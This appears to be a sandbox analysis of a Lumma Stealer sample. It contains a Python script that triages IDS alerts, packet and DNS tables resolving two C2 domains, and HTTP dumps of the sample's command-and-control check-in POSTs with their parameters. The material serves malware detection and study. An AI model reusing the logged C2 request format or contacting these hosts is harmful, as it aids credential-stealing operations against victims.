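    Alert("2025-01-05T18:58:23.191474+0100", 2028371, JA3, 3, HOST, 49742, C2, 443, "TCP"),
    Alert("2025-01-05T18:58:23.623861+0100", 2054653, "ET MALWARE Lumma Stealer CnC Host Checkin", 1, HOST, 49742, C2, 443, "TCP"),
    Alert("2025-01-05T18:58:24.491158+0100", 2028371, JA3, 3, HOST, 49748, C2_ALT, 443, "TCP"),
]


def flow_key(a):
    """5-tuple identifying one TCP connection in the sandbox capture."""
    return (a.src, a.sport, a.dst, a.dport, a.proto)


def triage(alerts, family="Lumma"):
    """Group alerts by flow and summarise what fired on each connection.

    Returns {flow_key: summary}; sids are kept in time order (sorted() is
    stable, so rows with identical timestamps keep their table order).
    """
    flows = defaultdict(list)
    for a in sorted(alerts, key=lambda a: a.ts):
        flows[flow_key(a)].append(a)
    summary = {}
    for key, items in flows.items():
        summary[key] = {
            "first_seen": items[0].ts,
            "sids": [a.sid for a in items],
            "top_priority": min(a.priority for a in items),
            "ja3_first": items[0].msg == JA3,            # fingerprint hit precedes content hits
            "family_hit": any(family in a.msg for a in items),
            "checkin": any("CnC" in a.msg for a in items),
            "exfil": any("Exfiltration" in a.msg for a in items),
        }
    return summary


def by_destination(summary):
    """Roll the per-flow view up to destination IPs.

    A destination with JA3-only flows deserves a look but is not confirmed C2
    on the fingerprint alone; one with content-rule hits is.
    """
    dests = defaultdict(lambda: {"flows": 0, "family_flows": 0, "exfil": False})
    for (_src, _sport, dst, _dport, _proto), info in summary.items():
        d = dests[dst]
        d["flows"] += 1
        d["family_flows"] += int(info["family_hit"])
        d["exfil"] = d["exfil"] or info["exfil"]
    return dict(dests)


if __name__ == "__main__":
    flows = triage(ALERTS)
    for key, info in flows.items():
        print(f"{key[1]:>5} -> {key[2]}: sids={info['sids']} checkin={info['checkin']} exfil={info['exfil']}")
    print(by_destination(flows))
```

On this data the roll-up gives 104.21.64.1 eight flows, four of them with a content-based Lumma hit and one of those flagged as exfiltration, while 185.161.251.21 has a single JA3-only flow; the JA3 alert is the first alert on every connection, which is what you expect from a rule that matches the ClientHello.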
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 5, 2025 18:58:13.490050077 CET | 49721 | 443 | 192.168.2.5 | 104.21.64.1
Jan 5, 2025 18:58:13.490073919 CET | 443 | 49721 | 104.21.64.1 | 192.168.2.5
Jan 5, 2025 18:58:13.490151882 CET | 49721 | 443 | 192.168.2.5 | 104.21.64.1
Jan 5, 2025 18:58:13.491359949 CET | 49721 | 443 | 192.168.2.5 | 104.21.64.1
Jan 5, 2025 18:58:13.491373062 CET | 443 | 49721 | 104.21.64.1 | 192.168.2.5
Jan 5, 2025 18:58:13.957245111 CET | 443 | 49721 | 104.21.64.1 | 192.168.2.5
Jan 5, 2025 18:58:13.957384109 CET | 49721 | 443 | 192.168.2.5 | 104.21.64.1
Jan 5, 2025 18:58:13.963208914 CET | 49721 | 443 | 192.168.2.5 | 104.21.64.1
Jan 5, 2025 18:58:13.963213921 CET | 443 | 49721 | 104.21.64.1 | 192.168.2.5
Jan 5, 2025 18:58:13.963541985 CET | 443 | 49721 | 104.21.64.1 | 192.168.2.5
Jan 5, 2025 18:58:14.010710001 CET | 49721 | 443 | 192.168.2.5 | 104.21.64.1
Jan 5, 2025 18:58:14.010710001 CET | 49721 | 443 | 192.168.2.5 | 104.21.64.1
Jan 5, 2025 18:58:14.010788918 CET | 443 | 49721 | 104.21.64.1 | 192.168.2.5
Jan 5, 2025 18:58:14.714171886 CET | 443 | 49721 | 104.21.64.1 | 192.168.2.5
Jan 5, 2025 18:58:14.714258909 CET | 443 | 49721 | 104.21.64.1 | 192.168.2.5
Jan 5, 2025 18:58:14.714332104 CET | 49721 | 443 | 192.168.2.5 | 104.21.64.1
Jan 5, 2025 18:58:14.717242002 CET | 49721 | 443 | 192.168.2.5 | 104.21.64.1
Jan 5, 2025 18:58:14.717248917 CET | 443 | 49721 | 104.21.64.1 | 192.168.2.5
Jan 5, 2025 18:58:14.717278004 CET | 49721 | 443 | 192.168.2.5 | 104.21.64.1
Jan 5, 2025 18:58:14.717283010 CET | 443 | 49721 | 104.21.64.1 | 192.168.2.5
Jan 5, 2025 18:58:14.732553005 CET | 49722 | 443 | 192.168.2.5 | 104.21.64.1
Jan 5, 2025 18:58:14.732578039 CET | 443 | 49722 | 104.21.64.1 | 192.168.2.5
Jan 5, 2025 18:58:14.732662916 CET | 49722 | 443 | 192.168.2.5 | 104.21.64.1
Jan 5, 2025 18:58:14.732960939 CET | 49722 | 443 | 192.168.2.5 | 104.21.64.1
Jan 5, 2025 18:58:14.732970953 CET | 443 | 49722 | 104.21.64.1 | 192.168.2.5
Jan 5, 2025 18:58:15.214222908 CET | 443 | 49722 | 104.21.64.1 | 192.168.2.5
Jan 5, 2025 18:58:15.214339972 CET | 49722 | 443 | 192.168.2.5 | 104.21.64.1
Jan 5, 2025 18:58:15.215766907 CET | 49722 | 443 | 192.168.2.5 | 104.21.64.1
Jan 5, 2025 18:58:15.215776920 CET | 443 | 49722 | 104.21.64.1 | 192.168.2.5
Jan 5, 2025 18:58:15.216003895 CET | 443 | 49722 | 104.21.64.1 | 192.168.2.5
Jan 5, 2025 18:58:15.217211962 CET | 49722 | 443 | 192.168.2.5 | 104.21.64.1
Jan 5, 2025 18:58:15.217242002 CET | 49722 | 443 | 192.168.2.5 | 104.21.64.1
Jan 5, 2025 18:58:15.217273951 CET | 443 | 49722 | 104.21.64.1 | 192.168.2.5
Jan 5, 2025 18:58:15.710479975 CET | 443 | 49722 | 104.21.64.1 | 192.168.2.5
Jan 5, 2025 18:58:15.710540056 CET | 443 | 49722 | 104.21.64.1 | 192.168.2.5
Jan 5, 2025 18:58:15.710647106 CET | 443 | 49722 | 104.21.64.1 | 192.168.2.5
Jan 5, 2025 18:58:15.710669994 CET | 49722 | 443 | 192.168.2.5 | 104.21.64.1
Jan 5, 2025 18:58:15.710683107 CET | 443 | 49722 | 104.21.64.1 | 192.168.2.5
Jan 5, 2025 18:58:15.710695028 CET | 443 | 49722 | 104.21.64.1 | 192.168.2.5
Jan 5, 2025 18:58:15.710737944 CET | 49722 | 443 | 192.168.2.5 | 104.21.64.1
Jan 5, 2025 18:58:15.710751057 CET | 443 | 49722 | 104.21.64.1 | 192.168.2.5
Jan 5, 2025 18:58:15.710792065 CET | 443 | 49722 | 104.21.64.1 | 192.168.2.5
Jan 5, 2025 18:58:15.710792065 CET | 49722 | 443 | 192.168.2.5 | 104.21.64.1
Jan 5, 2025 18:58:15.710800886 CET | 443 | 49722 | 104.21.64.1 | 192.168.2.5
Jan 5, 2025 18:58:15.710830927 CET | 49722 | 443 | 192.168.2.5 | 104.21.64.1
Jan 5, 2025 18:58:15.710988998 CET | 443 | 49722 | 104.21.64.1 | 192.168.2.5
Jan 5, 2025 18:58:15.711337090 CET | 443 | 49722 | 104.21.64.1 | 192.168.2.5
Jan 5, 2025 18:58:15.711386919 CET | 49722 | 443 | 192.168.2.5 | 104.21.64.1
Jan 5, 2025 18:58:15.711391926 CET | 443 | 49722 | 104.21.64.1 | 192.168.2.5
Jan 5, 2025 18:58:15.715177059 CET | 443 | 49722 | 104.21.64.1 | 192.168.2.5
Jan 5, 2025 18:58:15.715226889 CET | 49722 | 443 | 192.168.2.5 | 104.21.64.1
Jan 5, 2025 18:58:15.715234995 CET | 443 | 49722 | 104.21.64.1 | 192.168.2.5
Jan 5, 2025 18:58:15.715289116 CET | 443 | 49722 | 104.21.64.1 | 192.168.2.5
Jan 5, 2025 18:58:15.715332031 CET | 49722 | 443 | 192.168.2.5 | 104.21.64.1
Jan 5, 2025 18:58:15.715393066 CET | 49722 | 443 | 192.168.2.5 | 104.21.64.1
Jan 5, 2025 18:58:15.715409040 CET | 443 | 49722 | 104.21.64.1 | 192.168.2.5
Jan 5, 2025 18:58:15.715419054 CET | 49722 | 443 | 192.168.2.5 | 104.21.64.1
Jan 5, 2025 18:58:15.715425014 CET | 443 | 49722 | 104.21.64.1 | 192.168.2.5
Jan 5, 2025 18:58:15.917217016 CET | 49723 | 443 | 192.168.2.5 | 104.21.64.1
Jan 5, 2025 18:58:15.917257071 CET | 443 | 49723 | 104.21.64.1 | 192.168.2.5
Jan 5, 2025 18:58:15.917368889 CET | 49723 | 443 | 192.168.2.5 | 104.21.64.1
Jan 5, 2025 18:58:15.917726994 CET | 49723 | 443 | 192.168.2.5 | 104.21.64.1
Jan 5, 2025 18:58:15.917738914 CET | 443 | 49723 | 104.21.64.1 | 192.168.2.5
Jan 5, 2025 18:58:16.373246908 CET | 443 | 49723 | 104.21.64.1 | 192.168.2.5
Jan 5, 2025 18:58:16.373394966 CET | 49723 | 443 | 192.168.2.5 | 104.21.64.1
Jan 5, 2025 18:58:16.374864101 CET | 49723 | 443 | 192.168.2.5 | 104.21.64.1
Jan 5, 2025 18:58:16.374875069 CET | 443 | 49723 | 104.21.64.1 | 192.168.2.5
Jan 5, 2025 18:58:16.375103951 CET | 443 | 49723 | 104.21.64.1 | 192.168.2.5
Jan 5, 2025 18:58:16.376391888 CET | 49723 | 443 | 192.168.2.5 | 104.21.64.1
Jan 5, 2025 18:58:16.376543999 CET | 49723 | 443 | 192.168.2.5 | 104.21.64.1
Jan 5, 2025 18:58:16.376570940 CET | 443 | 49723 | 104.21.64.1 | 192.168.2.5
Jan 5, 2025 18:58:16.928778887 CET | 443 | 49723 | 104.21.64.1 | 192.168.2.5
Jan 5, 2025 18:58:16.928894997 CET | 443 | 49723 | 104.21.64.1 | 192.168.2.5
                                                                                                              Jan 5, 2025 18:58:16.928987980 CET49723443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:16.929204941 CET49723443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:16.929217100 CET44349723104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:17.035218000 CET49724443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:17.035260916 CET44349724104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:17.035346031 CET49724443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:17.035778046 CET49724443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:17.035787106 CET44349724104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:17.512310982 CET44349724104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:17.512468100 CET49724443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:17.514002085 CET49724443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:17.514015913 CET44349724104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:17.514265060 CET44349724104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:17.515851021 CET49724443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:17.516042948 CET49724443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:17.516089916 CET44349724104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:17.516141891 CET49724443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:17.516148090 CET44349724104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:18.046758890 CET44349724104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:18.046853065 CET44349724104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:18.046920061 CET49724443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:18.047094107 CET49724443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:18.047121048 CET44349724104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:18.231301069 CET49725443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:18.231349945 CET44349725104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:18.231512070 CET49725443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:18.231724024 CET49725443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:18.231735945 CET44349725104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:18.684847116 CET44349725104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:18.684916973 CET49725443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:18.686976910 CET49725443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:18.686991930 CET44349725104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:18.687295914 CET44349725104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:18.690229893 CET49725443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:18.690639019 CET49725443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:18.690670013 CET44349725104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:18.690726042 CET49725443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:18.690733910 CET44349725104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:19.536407948 CET44349725104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:19.536503077 CET44349725104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:19.536586046 CET49725443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:19.536834002 CET49725443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:19.536849022 CET44349725104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:19.897947073 CET49728443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:19.897991896 CET44349728104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:19.898070097 CET49728443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:19.898499012 CET49728443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:19.898519039 CET44349728104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:20.350382090 CET44349728104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:20.350470066 CET49728443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:20.351871967 CET49728443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:20.351891994 CET44349728104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:20.352144957 CET44349728104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:20.353308916 CET49728443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:20.353440046 CET49728443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:20.353451014 CET44349728104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:20.812711000 CET44349728104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:20.812834024 CET44349728104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:20.813065052 CET49728443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:20.813528061 CET49728443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:20.813553095 CET44349728104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:21.658605099 CET49731443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:21.658658028 CET44349731104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:21.658782005 CET49731443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:21.659168005 CET49731443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:21.659178019 CET44349731104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:22.150168896 CET44349731104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:22.150235891 CET49731443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:22.152601004 CET49731443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:22.152611017 CET44349731104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:22.152862072 CET44349731104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:22.155206919 CET49731443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:22.155469894 CET49731443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:22.155474901 CET44349731104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:22.682291031 CET44349731104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:22.682393074 CET44349731104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:22.682595968 CET49731443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:22.682704926 CET49731443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:22.682723999 CET44349731104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:22.737252951 CET49742443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:22.737277031 CET44349742104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:22.737353086 CET49742443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:22.737668037 CET49742443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:22.737678051 CET44349742104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:23.191389084 CET44349742104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:23.191473961 CET49742443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:23.202440023 CET49742443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:23.202455997 CET44349742104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:23.202675104 CET44349742104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:23.206343889 CET49742443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:23.206473112 CET49742443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:23.206492901 CET44349742104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:23.623876095 CET44349742104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:23.623955011 CET44349742104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:23.624298096 CET49742443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:23.624732971 CET49742443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:23.624742031 CET44349742104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:23.624764919 CET49742443192.168.2.5104.21.64.1
                                                                                                              Jan 5, 2025 18:58:23.624769926 CET44349742104.21.64.1192.168.2.5
                                                                                                              Jan 5, 2025 18:58:23.761203051 CET49748443192.168.2.5185.161.251.21
                                                                                                              Jan 5, 2025 18:58:23.761234045 CET44349748185.161.251.21192.168.2.5
                                                                                                              Jan 5, 2025 18:58:23.761526108 CET49748443192.168.2.5185.161.251.21
                                                                                                              Jan 5, 2025 18:58:23.762450933 CET49748443192.168.2.5185.161.251.21
                                                                                                              Jan 5, 2025 18:58:23.762459993 CET44349748185.161.251.21192.168.2.5
                                                                                                              Jan 5, 2025 18:58:24.491072893 CET44349748185.161.251.21192.168.2.5
                                                                                                              Jan 5, 2025 18:58:24.491158009 CET49748443192.168.2.5185.161.251.21
                                                                                                              Jan 5, 2025 18:58:24.492914915 CET49748443192.168.2.5185.161.251.21
                                                                                                              Jan 5, 2025 18:58:24.492925882 CET44349748185.161.251.21192.168.2.5
                                                                                                              Jan 5, 2025 18:58:24.493165016 CET44349748185.161.251.21192.168.2.5
                                                                                                              Jan 5, 2025 18:58:24.494580984 CET49748443192.168.2.5185.161.251.21
                                                                                                              Jan 5, 2025 18:58:24.539325953 CET44349748185.161.251.21192.168.2.5
                                                                                                              Jan 5, 2025 18:58:24.753623009 CET44349748185.161.251.21192.168.2.5
                                                                                                              Jan 5, 2025 18:58:24.753691912 CET44349748185.161.251.21192.168.2.5
                                                                                                              Jan 5, 2025 18:58:24.753746986 CET49748443192.168.2.5185.161.251.21
                                                                                                              Jan 5, 2025 18:58:24.754064083 CET49748443192.168.2.5185.161.251.21
                                                                                                              Jan 5, 2025 18:58:24.754080057 CET44349748185.161.251.21192.168.2.5
                                                                                                              Jan 5, 2025 18:58:24.754111052 CET49748443192.168.2.5185.161.251.21
                                                                                                              Jan 5, 2025 18:58:24.754117012 CET44349748185.161.251.21192.168.2.5
UDP packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 5, 2025 18:58:13.472675085 CET | 61144 | 53 | 192.168.2.5 | 1.1.1.1
Jan 5, 2025 18:58:13.485023975 CET | 53 | 61144 | 1.1.1.1 | 192.168.2.5
Jan 5, 2025 18:58:23.627480984 CET | 61097 | 53 | 192.168.2.5 | 1.1.1.1
Jan 5, 2025 18:58:23.736006975 CET | 53 | 61097 | 1.1.1.1 | 192.168.2.5

DNS queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 5, 2025 18:58:13.472675085 CET | 192.168.2.5 | 1.1.1.1 | 0xe229 | Standard query (0) | displayclubby.sbs | A (IP address) | IN (0x0001) | false
Jan 5, 2025 18:58:23.627480984 CET | 192.168.2.5 | 1.1.1.1 | 0x932d | Standard query (0) | cegu.shop | A (IP address) | IN (0x0001) | false

DNS answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 5, 2025 18:58:13.485023975 CET | 1.1.1.1 | 192.168.2.5 | 0xe229 | No error (0) | displayclubby.sbs | | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Jan 5, 2025 18:58:13.485023975 CET | 1.1.1.1 | 192.168.2.5 | 0xe229 | No error (0) | displayclubby.sbs | | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Jan 5, 2025 18:58:13.485023975 CET | 1.1.1.1 | 192.168.2.5 | 0xe229 | No error (0) | displayclubby.sbs | | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Jan 5, 2025 18:58:13.485023975 CET | 1.1.1.1 | 192.168.2.5 | 0xe229 | No error (0) | displayclubby.sbs | | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Jan 5, 2025 18:58:13.485023975 CET | 1.1.1.1 | 192.168.2.5 | 0xe229 | No error (0) | displayclubby.sbs | | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Jan 5, 2025 18:58:13.485023975 CET | 1.1.1.1 | 192.168.2.5 | 0xe229 | No error (0) | displayclubby.sbs | | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Jan 5, 2025 18:58:13.485023975 CET | 1.1.1.1 | 192.168.2.5 | 0xe229 | No error (0) | displayclubby.sbs | | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Jan 5, 2025 18:58:23.736006975 CET | 1.1.1.1 | 192.168.2.5 | 0x932d | No error (0) | cegu.shop | | 185.161.251.21 | A (IP address) | IN (0x0001) | false

Contacted domains

• displayclubby.sbs
• cegu.shop
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49721 | 104.21.64.1 | 443 | 6576 | C:\Users\user\Desktop\Setup.exe

Timestamp | Bytes transferred | Direction | Data (on the lines that follow each entry)

2025-01-05 17:58:14 UTC | 264 | OUT
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: displayclubby.sbs

2025-01-05 17:58:14 UTC | 8 | OUT
Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life

2025-01-05 17:58:14 UTC | 1133 | IN
HTTP/1.1 200 OK
Date: Sun, 05 Jan 2025 17:58:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=vq17s761ffig0fn6ac4gqqr0h4; expires=Thu, 01 May 2025 11:44:53 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BYlyM3VrSuFcfyx6CsrRpJJ15Ol6Nd%2Fjs7ZAe7RPNZ3MD1sQTbjsS8Aya7MynNbX8Cpewc1oV63d5gOv9lM0jprhmOv7D4sP4Kwwdx%2BkUGgAEhl0OCZEHpRNOy%2B2Ssz%2FslX2Bg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fd55af1ea9e440d-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1812&min_rtt=1746&rtt_var=702&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2842&recv_bytes=908&delivery_rate=1672394&cwnd=178&unsent_bytes=0&cid=1f0f9fb5acda0613&ts=767&x=0"

2025-01-05 17:58:14 UTC | 7 | IN
Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok

2025-01-05 17:58:14 UTC | 5 | IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                              1 | 192.168.2.5 | 49722 | 104.21.64.1 | 443 | 6576 | C:\Users\user\Desktop\Setup.exe
                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                              2025-01-05 17:58:15 UTC | 265 | OUT | POST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 77
                                                                                                              Host: displayclubby.sbs
                                                                                                              2025-01-05 17:58:15 UTC | 77 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 47 41 53 26 6a 3d 65 66 64 65 62 64 65 30 35 37 61 31 64 66 33 66 37 63 31 35 62 37 66 34 64 61 39 30 37 63 32 64
                                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--GAS&j=efdebde057a1df3f7c15b7f4da907c2d
                                                                                                              2025-01-05 17:58:15 UTC | 1125 | IN | HTTP/1.1 200 OK
                                                                                                              Date: Sun, 05 Jan 2025 17:58:15 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=hs3arq243mg8o3n3fq250rlmg4; expires=Thu, 01 May 2025 11:44:54 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UCVCC0NPN2bMrWLPZN9NjoccbrSBvbB9Cp9lZAg71QEXFLGdgZtpFriOOvPjoAd5X6IWpaEDZh5oE1L5ZdRjDFgWQjbzOODo%2F5o5aACxYld3Aa7rLAMsLqBHpMayfVY4L5vH8g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8fd55af9ab2d7c6a-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2026&min_rtt=2023&rtt_var=766&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=978&delivery_rate=1423001&cwnd=218&unsent_bytes=0&cid=53902b8ce7b886e8&ts=503&x=0"
                                                                                                              2025-01-05 17:58:15 UTC244INData Raw: 33 61 38 38 0d 0a 4b 78 4b 68 36 76 7a 6c 45 65 63 65 4d 54 6d 4e 30 4b 51 52 4a 61 47 47 4f 7a 58 6a 66 45 78 41 5a 77 44 32 61 72 4c 6b 71 4b 56 51 4d 4e 66 49 78 74 45 39 78 57 31 55 47 37 65 32 78 58 31 57 78 4b 6f 5a 56 49 64 65 64 69 59 47 62 49 55 50 6e 73 62 65 79 41 6b 6f 78 34 75 51 6c 6e 54 4c 50 46 52 42 72 2b 72 2f 61 67 66 45 36 42 6b 50 77 52 6b 6d 49 67 5a 73 6c 41 76 5a 69 39 6a 4a 53 48 72 4e 6a 5a 53 41 63 6f 4e 2f 58 56 54 6f 74 63 46 77 54 38 2f 76 56 6c 32 4f 58 6d 42 69 41 6e 72 55 55 4a 43 70 7a 64 46 4b 58 38 43 5a 6c 38 64 73 79 32 55 54 58 4f 50 79 6e 6a 4e 45 78 4f 52 58 55 34 63 58 4a 43 67 50 5a 4a 55 4f 32 4a 54 42 77 30 4e 36 77 34 36 56 69 6e 75 58 63 6c 64 54 34 37 50 4c 63 41 65 4e 70 46
